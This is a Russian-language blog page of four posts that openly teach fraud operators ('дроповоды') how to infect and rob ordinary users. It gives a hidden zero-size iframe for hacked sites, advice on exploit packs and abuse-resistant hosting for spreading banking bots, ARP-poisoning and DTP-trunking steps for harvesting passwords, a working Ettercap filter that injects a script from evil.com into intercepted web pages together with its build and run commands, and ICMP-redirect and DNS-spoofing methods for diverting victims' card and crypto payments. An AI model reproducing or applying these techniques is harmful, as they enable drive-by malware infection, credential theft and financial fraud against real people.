Метка: ettercap ng mitm

  • Кому и зачем нужен iFrame трафик и причём тут дроповоды и обнал

    Кому и зачем нужен iFrame трафик и причём тут дроповоды и обнал



    Трафик — на сленге вебмастеров и поисковых оптимизаторов — количество посетителей, пришедших на веб-сайт или дорвей, он разделяется на страны, или же можно купить себе микс трафф — это смешаный трафик нескольких стран стразу.
    как конвертировать трафик в просмотры AdSense
    Для чего нужен трафик?
    В своей основе iFrame трафик реальные дроповоды используют в своих схемах для загрузок (что такое iFrame я расскажу позже). А что такое загрузки? Ещё трафик можно продавать.

    Где взять трафик?
    Конечно же трафик можно купить, но для чего? Его можно добыть самому и продавать или использовать для загрузок банковских ботов. Ещё трафик можно брать с ломаных сайтов, дорвеев, спам рассылок…

    Чтобы иметь трафик дроповодам darkmoney нужны FTP или прогуженый шелл различных сайтов, а лучше иметь своё доверенное лицо в Укртелекоме — это самый надёжный вариант.

    Для чего мне нужны FTP и Shell и что мне с ними делать?
    iFrame — это код HTML внутри страницы. С помощью iFrame дроповод darkmoney может вставлять один HTML документ в другой! Проще говоря, iFrame — это код, который можно вписать в страницу любого сайта (или в транзитный трафик), чтобы поиметь трафик самому.

    Например, мы вставили свой iFrame в главную страницу сайта www.site.ru и при заходе на сайт пользователь будет заходить одновременно на наш сайт, не ведая того!
    Вот и сам iFrame код, который нужно вставить в код сайта с которого хотим получать трафик:

    <iframe src=»http://site.ru/sploit.php» width=»0″ height=»0″ frameborder=»0″></iframe>

    где:

    http://site.ru/sploit.php — это сайт на который пользователи site.ru будут заходить одновременно
    width=»0″ длина равна 0
    height=»0″ высота равна 0
    frameborder=»0″ граница фрейма равна 0

    Что делать с Iframe?
    Берем FTP или Shell какого-либо сайта, заходим в рабочий каталог сайта и редактируем главную страницу, обычно это index.html (php) или же заюзаем фильтры Ettercap NG через своего человека в Укртелекоме, и вставляем наш iFrame, не забываем после этого сохранить страницу.

    Что нужно для продажи трафика?
    Есть такая штука, как TDS — Traffic Direct System, — это система управления трафиком, в общем, такой небольшой web сайт, с помощью которого распределяется трафик, фильтруется, ведется статистика. Если у тебя возникает вопрос “а зачем оно мне нужно, у меня трафа мало и фильтровать его мне не нужно”, то отвечаю.

    Например, ты лил трафф на кодеки, или на партнёрки, а они вдруг взяли и в новостях сегодня написали, что меняют свой домен. Что, будешь менять на всех дорах редирект?.. а когда они опять сменят домен, опять перелопачивать доры? Лучше в таком случае перенаправить весь трафф на Simple TDS, а от-туда уже лить трафф на партнерку. Или тебе захочется попробовать лить трафф на другую партнёрку, или даже просто на другой фид уже существующей.

    В общем, если начинаете задумываться о бизе на трафике, то об установке Simple TDS следует позаботится в первую очередь. Сильно углубляться про TDS я не буду, но хочу дать не большой совет по поводу хостинга на который вы будете лить свой трафик. Покупайте лишь абузоустойчивый хостинг, потому что админы сайтов могут заподозрить не ладное и найти ваш iFrame и будут жаловаться вашему хостеру, поэтому лучше сразу покупать абузный хостинг.
    Ну вот и всё, теперь поговорим про загрузки.

    Что же такое эти загрузки?
    Загрузки — это загрузка и запуск файла на компьютере клиента банка или простого лоха, — один из самых распространённых методов распространения банковских ботов в сети Интернет.

    Загрузки можно делать с помощью ботнета и связки сплоитов. Поговорим про использование связки сплоитов…

    Загрузки — это очень денежное дело, больше всего ценятся загрузки следующих стран: AU, UK, IT, NZ, ES, US.

    Что нам нужно для того чтобы делать загрузки?
    Нам нужен трафик, связка сплоитов и абузоустойчивый хостинг.

    Допустим что у нас есть 5.000 трафика, это не означает что это у нас будет 5.000 загрузок, количество загрузок зависит от пробива используемой нами связки, если пробив у связки 20% значит у нас будет 1.000 загрузок.

    Теперь про связку сплоитов
    Exploit — это скрипт, который позволит нам выполнить действия на машине жертвы, через уязвимость в какой-либо программе (чаще всего в браузере).
    А связка сплоитов (exploit-pack) это несколько сплоитов связанных в один скрипт. Причем связка построена так, что при открытии её пользователем она сама определяет версию операционной системы пользователя, версию обозревателя, версию установленной Java-машины и в зависимости от этого сама подбирает наиболее подходящий сплоит для нашего клиента.

    Что же такое пробив связки?
    Пробив — это процент загрузок с 1.000 трафика. Пробив зависит не только от связки, но и от качества трафика, то есть сколько длилась сессия и сколько по времени пользователь находился на сайте. Оно и понятно, чем дольше он находился — тем лучше для пробива и прогруза. Лучше всего брать приват связки, с хорошим пробивом, которые не палят антивирусы.

    Как делать загрузки?
    Думаю, вы уже сами догадались, но для не понятливых объясню. Например, ваша связка находится по адресу www.site.com/svjzka.php — значит нам надо лить трафик на этот адрес и тогда вы сможете получить всё, что захотите.

  • Как получить прибавку к зарплате в Ростелекоме

    Как получить прибавку к зарплате в Ростелекоме



    Для начала инженеру электросвязи стоит провести анализ пробегающего мимо него  сетевого трафика с помощью любого сетевого анализатора в «неразборчивом» режиме работы сетевой карты (promiscuous mode).

    В качестве сетевого анализатора для подобных целей замечательно подходит Wireshark или CommView. Чтобы выполнить этот этап, хватит и пары часов работы сетевого анализатора. По прошествии этого времени накопится достаточно данных для проведения анализа перехваченного трафика. И в первую очередь при его анализе следует обратить внимание на следующие протоколы:

    • протоколы коммутации (STP, PVST+, CDP, DTP, VTP, и им подобные)
    • протоколы маршрутизации (RIP, BGP, EIGRP, OSPF, IS-IS и другие)
    • протоколы динамической конфигурации узла (DHCP, BOOTP)
    • открытые протоколы (telnet, rlogin и подобные)
    Что касается открытых протоколов, – вероятность того, что они попадутся во время сбора пакетов проходящего мимо трафика в коммутируемой сети, достаточно мала. Однако, если такого трафика много, то в обследуемой сети явно наблюдаются проблемы в настройках сетевого оборудования.
    Во всех остальных случаях присутствует возможность проведения красивых атак:
    • классической атаки MITM (Man in the middle) в случае, когда используется DHCP, RIP
    • получение роли корневого узла STP (Root Bridge), что позволяет перехватывать трафик соседних сегментов
    • перевод порта в магистральный режим с помощью DTP (enable trunking); позволяет перехватывать весь трафик своего сегмента
    Для реализации атак на протоколы коммутации доступен замечательный инструмент Yersinia.

    Предположим, что в процессе анализа трафика были выявлены пролетающие мимо DTP-пакеты (смотри скриншот). Тогда отправка пакета DTP ACCESS/DESIRABLE может позволить перевести порт коммутатора в магистральный режим. Дальнейшее развитие этой атаки позволяет прослушивать свой сегмент.

    Yersinia MiTM attack

    После тестирования канального уровня стоит переключить внимание на третий уровень OSI. Дошла очередь и до проведения атаки ARP-poisoning. Тут все просто, выбираем инструмент Ettercap NG. Все дело в том, что в случае успешной реализации атаки ARP-poisoning в отношении всего своего сегмента может наступить ситуация, когда компьютер атакующего не справится с потоком поступающих данных и, в конечном счете, это может стать причиной отказа в обслуживании целого сегмента сети. Поэтому наиболее правильным будет выбрать единичные цели, например, рабочие места администраторов и/или разработчиков, какие-либо определенные серверы (возможно контроллер домена, СУБД, терминальный сервер, и другие важные элементы сети).
    Успешно проведенная атака ARP-poisoning позволяет получить в открытом виде пароли к различным информационным ресурсам – СУБД, каталогу домена (при понижении проверки подлинности NTLM), SNMP-community string, пароли для сетевого оборудования с уровнем доступа level 15 и другие приятные вещи. В менее удачном случае могут быть получены хеш-значения от паролей к различным системам, которые нужно будет постараться восстановить по радужным таблицам (rainbow tables), по словарю или атакой «в лоб». Перехваченные пароли могут использоваться где-то еще, и впоследствии это также необходимо подтвердить или опровергнуть.
    Кроме того, стоит проанализировать весь перехваченный трафик на присутствие данных учётных записей входа в платёжные сервисы, передаваемых в открытом виде. Для этого можно пропустить сохраненный cap-файл через NetResident и/или 0x4553-Intercepter. Второй, кстати, замечательно подходит для анализа накопленного трафика в целом.
  • Ettercap NG и угон транзитного IP трафика через BGP

    Ettercap NG и угон транзитного IP трафика через BGP



    Продолжу тему загрузок .ехе на компы обычных пользователей, собственно требуется «заставить» лоха перейти на страницу со сплоитом, который и прогрузит .ехе ему на комп


    Представим, что мы получили во временное пользование чью-то транзитную AS и у нас открылись широчайшие возможности доступа к трафику.
    Размножение ботов с помощью Ettercap NG

    На сей раз воспользуемся такой хорошей вещью как «Ettercap NG». Что приятно — есть и GUI’шный интерфейс, и консольная версия. Последняя версия — 0.7.3. На сайте ettercap.sourceforge.net есть исходники как под разные виды nix’ов, так и под винду. В общем, это сниффер, наделенный важными и нужными для нас возможностями.

    В их число входят:

    • Вынимание и, если надо, расшифровывание логинов и паролей к большому числу протоколов
    • Модификация передаваемых в обоих направлениях пакетов
    • Проведение Man in the Middle атак (MitM)
    • Пассивный анализ трафика с фингерпринтом ОС, сервисов хостов

    К тому же, Ettercap расширяет свой функционал за счет всевозможных плагинов.
    Но для данной задачи нам потребуются его возможности по поиску и модификации данных TCP/IP-пакетов на «живом» трафике.

    Общая идея такова: во-первых, имея доступ к трафику устанавливаем фильтр для Ettercap’а на модификацию HTTP-ответов от серверов, куда наши лохи заходят. Модификация будет заключаться в добавлении либо сплойта, либо ссылки на сплойт. Для точности буду рассказывать о консольной версии Ettercap, входящей в BackTrack 3.
    Для этого создадим текстовый файлик «http_filter.txt» и пишем в него следующий код — фильтр на HTTP-трафик.


    Код:

    //Если протокол – TCP, удаленный порт – 80
    if (ip.proto == TCP && tcp.dst == 80) {
    //Ищем строку
    if (search(DATA.data, «Accept-Encoding»)) {
    //Заменяем на мусор
    replace(«Accept-Encoding», «Blabla-Blahblah»);
    //Мессага для нас
    msg(«Accept-Encoding field has been changedn»); } }
    //Если протокол – TCP, исходящий порт – 80
    if (ip.proto == TCP && tcp.src == 80) { replace(«</body>», » <script type=»text/javascript» src=»http://evil.com/sploit.js»></script> » «);
    // Меняем ответ сервера – HTML-страницу, подставляя какой-то свой сплойт
    replace(«</html >», » <img src=»http://evil.com/evil.gif»></img>»); msg(«Success!n»);
    //Мессага для нас }

    Для создания фильтров к Ettercap существует примитивный «язык», которым мы и воспользовались. Здесь мы создали два «правила». Первое применяется к пакетам, отправленным на 80 порт по протоколу TCP. Обычно это запросы браузера на открытие той или иной страницы веб-серверу. В них ищем строчку «Accept-Encoding» (поле стандартного HTTP-заголовка, посылаемого браузером) и меняем ее на любой другой текст того же размера (это важно). Требуется это, потому что обычно в «Accept-Encoding» указывается, что ответы от веб-сервера можно сжимать. Но по сжатым данным мы не сможем провести необходимое нам изменение HTML-страниц. Поэтому мы меняем это поле на что-нибудь другое. Сервер же при разборе пропустит это кривое поле и ответит нам в несжатом виде. Второе правило применяется уже к принимаемым данным. Ситуация похожая. Делаем выборку пакетов от веб-сервера (протокол TCP, исходящий порт — 80). И меняем строчки «», «» на либо яваскриптовский, либо рисунок-сплойт, не суть важно.

    Почему именно эти теги будем менять? У них есть один плюс — они присутствуют почти на всех HTML-страничках в единичном числе, что повысит шансы на успешную эксплуатацию уязвимости при малом количестве запросов к нашему серваку. Но все зависит от ситуации, браузера жертвы и т.д. Еще пара моментов: функция «replace» регистрозависима, то есть можно повторить искомые строчки в разных регистрах, а функция «msg» выводит нам сообщения в логах, чтобы мы знали, когда правило задействовалось.Далее требуется переварить наш текстовый файл с фильтром в удобоваримый для Ettercap’a вид.

    Пишем в консоли:etterfilter http_filter.txt -o http_filter.ef
    Где http_filter.txt — наш файл с фильтром, а в «-o http_filter.ef» указываем имя будущего Еttercap-фильтра (необязательная опция).

    Далее запускаем сам Ettercap.ettercap -T -F http_filter.ef
    Где опция «-T» указывает на то, что мы запускаем текстовую версию Ettercap и «-F http_filter.ef» — подключаем полученный от Etterfilter фильтр.

    В итоге Ettercap будет фильтровать трафик, проходящий от лохов через нашу транзитную AS к банковским и финансовым учреждениям, добавляя в конец каждой HTML’ки наш сплойт.

    Как ты понимаешь, Ettercap — тулза крутая, особенно с возможностями фильтров, а они широки. Это и изменение, декодирование пакетов, и использование регекспов, и запуск команд… Основную инфу можно почерпнуть из man’ов и прилагаемых к Ettercap’у примеров.

  • Как перенаправить IP трафик с помощью BGP, используя Rehost Attacker 0.9

    Как перенаправить IP трафик с помощью BGP, используя Rehost Attacker 0.9






        Смысл работы этого софта заключается в следующем: на хост терпилы, которого вы собираетесь кинуть на бабло и сделать процессинг с его банковской карты на счёт своего дропа, с адресом 192.168.0.10 отправляется сообщение от имени маршрутизатора сети того лоха с адресом 192.168.0.1 ICMP REDIRECT TO и лох 192.168.0.10 его съедает, как настоящее, и теперь весь его трафик перенаправляется (изменён маршрут по умолчанию 0.0.0.0) через ваш хост 192.168.0.250, что и даёт вам возможность сделать процессинг крипты или фиата на карту или банковский счёт своего дропа.

    Далее уже начинается вторая фаза процессинга — это фильтрация и подмена данных, либо их модификация в режиме реального времени, на ваше усмотрение, но об этом мы расскажем вам чуть позже.

    Для целей процессинга крипты можно ещё использовать плагин Ettercap NGdns_spoof

    Этот плагин перехватывает DNS запросы и отвечает на них поддельным ответом. Вы можете выбрать запросы на которые плагин должен ответить, изменив etter.dns файл. Плагин перехватывает А, PTR и MX запросы. Если это был запрос типа А, имя ищется в файле и IP-адрес посылается в качестве ответа (вы можете использовать групповые символы в имени). Если это был PTR запрос, IP ищется в файле и имя возвращается абоненту (за исключением тех именем, которые содержат шаблон). В случае MX запроса заготовлен специальный ответ.

    Хост разрешается из файта mail.host с поддельным адресом, где дополнительная запись содержится в mail.host. Первый адрес или хост который соответствует таблице будет сообщено абоненту, так что будьте внимательны при оформлении таблицы.